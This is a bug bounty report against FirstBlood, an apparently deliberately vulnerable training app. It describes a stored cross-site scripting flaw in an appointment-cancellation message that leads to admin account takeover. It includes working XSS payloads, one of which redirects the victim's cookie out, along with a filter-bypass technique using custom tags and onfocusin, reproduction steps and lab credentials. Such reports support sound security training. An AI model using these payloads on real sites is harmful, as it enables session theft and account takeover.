FirstBlood-#78[COLLAB] 1 Click XSS can lead to Admin Account Takeover
This issue was discovered on FirstBlood v1

On 2021-05-09, 0xblackbird Level 5 reported:

Hello Zseano! I hope you're doing well today! I found a stored cross-site scripting vulnerability that I could escalate to account takeover by stealing cookies. My payload currently requires minimal user-interaction, 1-click to be exact. If I still do find a better one, one without user interaction, I will make sure to update my report before triage.


My payload now only requires nothing to fire. Here is my payload: "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="confirm%601%60">

Payload that goes away with cookie: "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="window.location.href=''%2bdocument.cookie">

Thanks a lot! Found a similar bug in the wild, this again proves that FirstBlood it is extremely realistic :D!

Steps to reproduce

  • Visit /book-appointment.html and fill in all the required fields and click on Book Appointment.
  • Next, copy the Appointment ID and visit /yourappointments.php.
  • Paste in the previous copied ID and Retrieve Appointment.
  • After that, scroll down and click on Cancel Appointment. Make sure you intercept this request.
  • Add the message with the following payload: "><xss/id="1"/tabindex="1"/onfocusin="window.location.href=''%2bdocument.cookie">
  • You will normally get a confirm box confirming that Your appointment has been cancelled, click on Ok.
  • Next, visit /login.php and login with the credentials provided: drAdmin:s2Wpx5zfUvlSZhspJ.
  • Navigate to /drpanel/cancelled.php, and click on the last cancelled appointment.
  • You'll see that we get redirected to with our cookie in the cookie parameter. This cookie can be easily reused even if the admin securily logged out. This is because the cookie does not expire.


I was able to take over an admin account by cancelling our appointment and including a message.


It took me some time to get to this payload, I first tried some basic html tags and quickly released that most of the common ones are blocked. Because we are not allowed to use any automated tools, I went and just tried custom tags. This worked :D! I thought that maybe <xss/contenteditable/autofocus/onfocus=""> would work but it didn't because of the onfocus event handler. This meant that we had to find one with user interaction. That's how I came accross onfocusin, this event handler didn't get removed, and I was again one step closer to achieving stored cross-site scripting :D!! Quickly after that I got a working 1-click payload. And because cookies were not httpOnly, I went for stealing cookies as this is the easiest way of achieving account takeover!

Thanks a lot for the fun challenge! Have a nice day!


Endpoint: /api/ma.php

Parameter: message

Payload: "><xss/id="1"/tabindex="1"/style="font-size:%20100px"/autofocus/onfocusin="confirm`1`">

FirstBlood ID: 12
Vulnerability Type: Auth issues

If the request method is changed from POST to GET, then the endpoint /drapi/qp.php becomes available to ANY user due to an application logic error

Report Feedback


Creator & Administrator

Great report 0xblackbird and nice finding! I'm splitting the 1500 bounty between three of you, great team work!